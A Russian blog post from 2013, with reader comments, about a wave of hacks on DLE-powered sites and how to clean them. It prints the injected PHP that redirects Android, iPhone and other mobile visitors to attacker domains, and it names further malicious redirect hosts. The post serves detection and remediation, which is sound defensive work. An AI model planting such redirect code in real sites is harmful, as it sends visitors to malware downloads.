Как ломали сайты на DLE
Воскресенье, 10 Фев 2013 5:12
Начало. Уязвимость в сайтах на движке
Как видим, добавился не только новый домен http://yacounter.ws (ну любит злоумышленник зону ws, что тут поделать:)), но и eval.
Но и за первую версию также есть случаи, которые говорят следующее.
В файлах движка цмс dle появляется совсем другой код, например, такой:
if(stripos($_SERVER['HTTP_USER_AGENT'],"Android")!==false)
{header('Location: http://refresh-browser.00xff.net/');exit;}
Как видим, домен здесь совсем другой. Кроме того, были выявлены следующие факты:
- в главном шаблоне сайта, main.tpl, в яваскриптах появляются посторонние строки;
- кто-то меняет кодировку шаблона, после чего пропадает весь русский текст (я думаю, что кодировку никто не меняет, просто-напросто так действует посторонний код);
- опять-таки в файле main.tpl едет вниз или в сторону вёрстка шаблона, что снова говорит о присутствии постороннего кода;
- в индексном файле появляются посторонние java-скрипты;
- появляются пользователи с правами администраторов, появляются сообщения о каких-то «левых» действиях в админ-панели сайта, меняются рекламные баннеры.
Как предотвратить взлом сайта?
Как ни банально это звучит, для того, чтобы предотвратить взлом сайтов, надо, как минимум, выполнять следующие требования (о которых, конечно же, все знают, но по разным причинам не делают):
- обновлять программное обеспечение на компьютере, устанавливать своевременно все новые патчи, закрывающие обнаруженные уязвимости;
- установить антивирус и постоянно обновлять антивирусные базы;
- не скачивать сомнительные файлы, не переходить по подозрительным ссылкам из электронной почты, скайпа, аськи и т. д.
А теперь что касается непосредственно защиты dle-блогов.
Что мы имеем:
На всех сайтах дле вначале регистрировался бот, по следам которого шёл хакер и заливал на сайты шелл.
Дата файлов, которые были изменены, оставалась такой же.
Версия ДЛЕ роли не играла, так же не играло роли то, была ли установлена лицензионная или же нуленная версия DLE.
На форумах упоминалось про то, что возможно играли соответствующую роль настройки сервера на хостинге. Однако я думаю, что это касалось только тех серверов, которые администрировались самостоятельно опытными админами. На общих хостингах настройки роли не играли, так как были взломаны сайты на следующих площадках: iphoster, webhost1.ru, ihc, фест.
И самое главное – взломы произошли там, где была разрешена регистрация новых пользователей. Отсюда сразу следует вывод, который напрашивается сам собой: запретить регистрацию новых пользователей, по крайней мере, до поры-до времени, пока производитель данной CMS не закроет окончательно все дыры в движке. Хотя он и утверждает, что дыр на сегодняшний момент в ДЛЕ нет. Кстати, на днях вышла новая версия движка, dle 9.8, но это так, к слову.
Если же, как утверждают некоторые, у них такие высокопосещаемые проекты, на которых ну никак нельзя запретить регистрацию, то можно, например, добавлять новых пользователей через ручную регистрацию, по заявке, чтобы исключить регистрацию новых ботов. И ещё советовал бы удалить всех подозрительных пользователей, таких как tehApocalypse, зарегистрированных в конце декабря – в январе этого года.
Как можно запретить регистрацию новых пользователей в ДЛЕ? Просто в настройках системы – «Настройки для пользователей» - «Максимальное количество зарегистрированных пользователей», ставите 1 или любое другое число, не превышающее количество уже зарегистрированных юзеров.
А можно сделать немного по-другому. Если вы по каким-то причинам не хотите обновляться до последней версии движка или устанавливать все патчи безопасности (к примеру, не хотите потерять все установленные моды или у вас не лицензионная копия), можно запретить загрузку аватаров на сайт. Чтобы отключить загрузку аватаров, идёте в «Настройка групп пользователей» – нужная группа – в пункте «Максимальный размер аватара» ставите 0. Таким образом, вы запретили загрузку аватаров на сервер. Для этого можно создать специальную группу и всех новых пользователей помещать туда.
Теперь что касается такого варианта, когда меняются индексные файлы, прописываются посторонние строки, JS-скрипты, появляются новые пользователи с правами администраторов. Возможно, тут дело идет всего-навсего про брутфорс (то есть банальный подбор паролей), поскольку есть информация, что некоторые админы ставили до безобразия простые пароли, плюс в логах сервера наблюдалась небывалая активность к файлу админпанели. (Его, кстати говоря, тоже не мешало бы поменять). А вот когда все посторонние пользователи удалялись и пароли менялись, то и подобные случаи также прекращались.
Ну а теперь поговорим про очистку сайтов от вредоносного кода.
Как можно избавиться от данного кода? Очень просто – для этого надо открыть все зараженные файлы в Total Commander или в любом блокноте наподобие Notepad++ и удалить указанные выше строки, а также установить все патчи безопасности, выложенные на официальном сайте. В противном случае вредоносный код появится опять на сайте в самое ближайшее время.
А так же, как вариант, закрыть регистрацию на сайте, запретить загрузку аватаров на сайт.
А теперь по порядку.
1. Блокнот. Если у вас нет никакого нормального блокнота, кроме стандартного виндусного, в срочном порядке скачивайте нормальный блокнот наподобие Notepad++. Скачать его можно с официального сайта. Этот блокнот выручит вас не раз в самых разных ситуациях.
Например, вы решили установить себе сайт на CMS Вордпресс.
Там необходимо будет править некоторые файлы, такие как wp-config и другие. Так вот, если делать это в обычном блокноте, может выскочить такая или похожая ошибка «Warning: Cannot modify header information - headers already sent by (output started at сайт/wp-config.php:1)» Происходит это из-за того, что стандартный виндоуский блокнот добавляет в начало файла сигнатуру BOM - Byte Order Mark. Вывод: пользуйтесь правильными блокнотами, такими как Ноутпед++.
2. Скачивайте все файла зараженного сайта на компьютер, если сайт очень большой, папку uploads можете не качать, там находятся закачанные файлы ваших сообщений. Все файлы помещаете в отдельную папку, назвав её, скажем virus.
3. Открываете блокнот, нажимаем «Найти» (Ctrl+F). Вкладка «Найти в файлах». Вводим имя домена, на который идет редирект, к примеру, statuses.ws. В поле «Папка» выбираем нашу папку /virus со скачанным сайтом. Жмём «Найти все». После непродолжительного поиска будут показаны отдельным списком внизу блокнота все файлы, в которых прописалась эта зараза.
4. Открываем по очереди все указанные файлы и чистим их от постороннего кода – аккуратно удаляем те участки кода, примеры которого приведены выше в данной статье. То есть удаляем не просто http://statuses.ws/, а весь код:
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
5. После этого проверяем всё ещё раз, если посторонний код больше не находится, заменяем все измененные файлы на сервере по фтп.
6. Ну и чтобы повторно не дать залить shell на сайт, принимаете все описанные выше меры предосторожности.
И напоследок, чтобы немного развеяться, видео про сео от алматинского сеошника:
И традиционный анекдот, на этот раз про хакеров:
Встречаются два хакера. Один хакер говорит другому:
- Вчера встретил такую потрясающую блондинку в ночном клубе.
- Да, и что?!
- Потанцевали, потом пригласил ее к себе на чашку кофе.
- Да ну!
- Ага, и когда мы вошли ко мне, она полностью разделась.
- Ну а дальше то что?!
- А потом я посадил её на стол, где стоит компьютер…
- У тебя дома компьютер?! А какой процессор?
Всем удачи!
Читать похожие статьи:
-
09.02.2013 Уязвимость в сайтах на движке dle (39)
-
20.02.2014 Как ломают сайты на Вордпресс (4)
-
02.02.2013 Как поменять юзер-агент в браузере (12)
-
26.01.2013 Взлом сайтов на ДЛЕ (24)
-
08.05.2013 Русский голос для Windows (58)
-
15.11.2010 Мошенник balakovo, Бормалей, Захар Боул и другие. Итоги недели (20)
Подпишитесь на комментарии, чтобы не пропустить
важный ответ:
RSS - подписка
Twitter - подписка
Уязвимость в сайтах на движке dle | SEO-semki пишет:
10 Фев 2013 в 05:15
[...] Как ломали сайты на DLE Поделиться записями в социальных [...]
Мясник пишет:
10 Фев 2013 в 12:39
спасибо, очень полезная статья!
seo пишет:
10 Фев 2013 в 16:41
Да, там главная фишка в том, что взломы производил именно зарегистрированный пользователь. Нет регистрации - нет взлома.
Виндос пишет:
10 Фев 2013 в 16:34
Плять, я в шоке. Тоже ламанули два сайта, версия 9.2 стояла ,прописали эту херотень. А я думаю, что это у меня так трафик резко начала падать, почистил, посмотрим, нда :evil:
игнат пишет:
22 Фев 2013 в 13:59
Премного благодарен! Кто предупрежден ,тот вооружен!
Оксана пишет:
23 Фев 2013 в 10:23
Никогда бы не подумала, что такое возможно ((
Leo пишет:
26 Фев 2013 в 15:13
Вроде бы все почистил у себя а пере направление на сторонний сайт все равно осталось (если заходить с мобильного устройства). Какие еще могут быть варианты вычистить сайт?
seo пишет:
27 Фев 2013 в 20:16
Что-то не заметил у вас никакого перенаправления, уже всё поправили?
Эри пишет:
15 Мар 2013 в 20:55
Привет
Вот у меня тоже взломали, у меня и раньше такое случалось, но в этот раз, вообще све сложнее, даже реклама прокручивается на сайте онлайн игры, только вот после того как я удаляю все эти левые перенаправления сайт сразу падает, что делать от всяких онлайн сервисов на проверку толку никакого
seo пишет:
16 Мар 2013 в 18:26
Привет,
не понятно какая реклама и что за сайт онлайн-игры :?:
Николай пишет:
27 Мар 2013 в 10:43
Взломы dle продолжаются, как это всё достало! Придется переходить на другой движок cms :twisted:
Евгений пишет:
21 Май 2013 в 23:49
А подскажите пожалуйста какие права должны стоять по ftp?
seo пишет:
22 Май 2013 в 12:47
По фтп? Ну наверное такие же, как и без фтп))
Евгений пишет:
22 Май 2013 в 23:49
А какие именно? На какие папки, файлы..и все таки какие?
seo пишет:
23 Май 2013 в 16:27
Согласно инструкции по установке движка dle права на файлы/папки ставятся следующим образом:
Для папки templates и всех вложенных в неё папок - 777;
для всех файлов в папке templates - 666;
для папок backup, uploads, а также для всех папок внутри них - права 777;
для папок /engine/data/, /engine/cache/, /engine/cache/system/ - также права chmod 777.
Евгений пишет:
24 Май 2013 в 20:05
Автору респект за помощь!
seo пишет:
25 Май 2013 в 11:26
Всегда пожалуйста :!:
dima пишет:
26 Май 2013 в 22:48
Помогите уже второй раз удаляю этот вирус, а перенаправление с мобильной версии все равно идет... :|
seo пишет:
27 Май 2013 в 15:12
Да, ваш сайт взломан, с мобильного идет переадресация сначала на сайт _http://dll-opera.com, затем на _http://mobi-service7.com, где предлагается скачать экзешный файл.
В принципе особых проблем здесь не вижу, вы не до конца удалили вредоносный код, поэтому идет редирект. Какие файлы чистили?
В статье https://seo-semki.ru/xaking-hacking/uyazvimost-v-sajtax-na-dvizhke-dle.html, в самом начале указано, какие файлы обычно поражаются в первую очередь, кроме того, проверьте файл .htaccess, полагаю, что вы его не смотрели.
seo пишет:
27 Май 2013 в 15:16
Пс. Кстати, вот эти ссылки вы размещали?:
_http://www.freeversions.ru/skype-free-download
_http://windows8center.ru/minecraft-dlya-windows-8.html
Ппс. Вас должна греть мысль, что вы не одиноки в этом мире, похожие проблемы есть у многих других сайтов, например,
mp3-load.ru
suchan-gazeta.com
sauketeso.org
dima пишет:
02 Июн 2013 в 15:14
Все файлы еще раз перепроверил кода не нашел, файлы .htaccess тоже проверял и в некоторых был не нужный код, все убрал и выставил права 444, но вирус так и остается жить на сайте, вчера яндекс написал что сайт содержит код, который может быть опасен для посетителей, что еще посоветуете сделать?
seo пишет:
02 Июн 2013 в 16:49
Такого просто не может быть, такой редирект не может взяться ниоткуда, тут два варианта - либо вы не всё удаляете и код остается, либо вы всё удаляете, но его прописывают заново.
Склоняюсь к первому варианту. Вы поставили запрет на загрузку анимированных аватарок?
Гуакамоле пишет:
30 Май 2013 в 18:18
Хорошая статья, но хочу вас заверить, что любой движок имеет дыры, через которые ломают сайт, а именно скрипты, базы данных. Но есть решение, конечно это мало кому понравиться, но есть неуязвимый сайт, который чтоб взломать, нужно валить целый сервер на котором находиться сайт жертва, это голый безскриптовый НТМЛ.
seo пишет:
01 Июн 2013 в 08:32
Предлагаете всем переходить на голый HTML?
Гуакамоле пишет:
01 Июн 2013 в 13:32
Да, и после этого процентов 95% всех взломов прировняются к нулю. Школота, то точно не порвет НТМЛ, умрет но не порвет :lol:
seo пишет:
02 Июн 2013 в 16:51
Школота нынче упорная пошла :mrgreen:
Алексей пишет:
08 Май 2014 в 19:55
да у меня на сайте кто то упорно пытается подобрать пароль меняя айпи
seo пишет:
09 Май 2014 в 14:58
Боты наверное. А в чём выражается "пытается подобрать пароль"?
sheval пишет:
03 Июл 2013 в 22:36
Привет брат! сто лет не заходил на твой сайт! смотрю ты пироги рассматриваешь и шелы...ну если подумать про конечный результат.
Как у тебя арбитраж..все на нем?...
seo пишет:
08 Июл 2013 в 11:55
Здарова, брат-уха! И тебе не хворать!
Скорее не пироги, а пирожки ;)
Анна пишет:
29 Июл 2013 в 14:07
Помогите мне пожалуйста, я пересмотрела уже все что возможно, может и что-то упустила, но уже бьюсь больше месяца, вот наткнулась на Ваш сайт, сделала все что написано, но нечего не находит, но проблема присутствует. Помогите пожалуйста разобраться.
seo пишет:
31 Июл 2013 в 15:12
А какая проблема, не вижу пока никакой проблемы.
Анна пишет:
31 Июл 2013 в 15:40
С мобильно когда заходишь, на сайт не переходит, а хочет скачать файл. Не возможно зайти ни с айфона, ни с андроида. Переискала весь код, но нечего найти не могу
seo пишет:
31 Июл 2013 в 21:05
Какой файл хочет скачать и откуда (урл)?
Если ничего не нашли - значит плохо смотрели. Неужели за месяц так вообще ничего и не смогли найти?
Анна пишет:
12 Авг 2013 в 14:55
нечего не могу найти, постоянная проблема, совершенно не знаю что делать
seo пишет:
14 Авг 2013 в 09:26
Ну тогда надо непосредственно все файлы смотреть, так трудно что-то сказать.
Иван пишет:
15 Дек 2013 в 10:36
Прочёл статью до конца. Спасибо! На Моём тоже какая-то хрень живёт. Причём нагружает процессор хостера, а лимит-то минимальный. Уже даже отключали сайт. при переписке с техподдержкой выяснилось, что происходит постоянная регистрация новых пользователей. Регистрацию прекратил сменой с упрощёноой системы регистрации на расширенную. Нагрузка на сервер прекратилась, но проблема не решена.
seo пишет:
15 Дек 2013 в 14:18
Пожалуйста.
Так в чём проблема-то, если в нагрузке на сервер, так вы же в конце сообщения написали, что после включения расширенной регистрации нагрузка на сервер прекратилась?
Поговори со своим компьютером | SEO-semki пишет:
22 Дек 2013 в 12:05
[…] как Notepad, подробнее про него можно почитать здесь: Как ломали сайты dle). 2) Наберите в блокноте или просто скопируйте в него […]
Как защитить сайт от взлома | SEO-semki пишет:
16 Янв 2014 в 22:38
[…] Второе – регулярно обновлять файлы движка и плагинов до новой версии. Проверять и скачивать все новые обновления безопасности (патчи), закрывающие найденные уязвимости, что особенно актуально для сообщества Dle. […]
Взлом сайта Вордпресс | SEO-semki пишет:
19 Фев 2014 в 07:29
[…] так давно я рассказывал про взлом Dle – сайтов, а сегодня расскажу вам увлекательную историю про […]
Валик пишет:
10 Апр 2014 в 02:21
У кого-то осталась сама аватарка с помощью которой ломали?
Саман пишет:
25 Ноя 2014 в 17:35
У меня осталась.
Саман пишет:
25 Ноя 2014 в 17:34
Дле сама по себе дырявая, потому что разработки российские, вы никогда не задумывались, почему зарубежные движки гораздо практичнее и защищеннее чем наши, отечественные разработки? Потому что за рубежом думают как защитить движок от взлома, а у нас думают, как его сломать. Все дело в психологии, менталитете людей и его очень трудно изменить. Кроме того, в dle есть крот, который работает на два фронта, и вашим и нашим, поэтому у них столько дыр.
И что самое обидное, администрация не признает ошибки и пытается их скрыть.
Прохоренко пишет:
14 Июн 2018 в 10:11
Саман, тебе жирный "+", сам думаю также.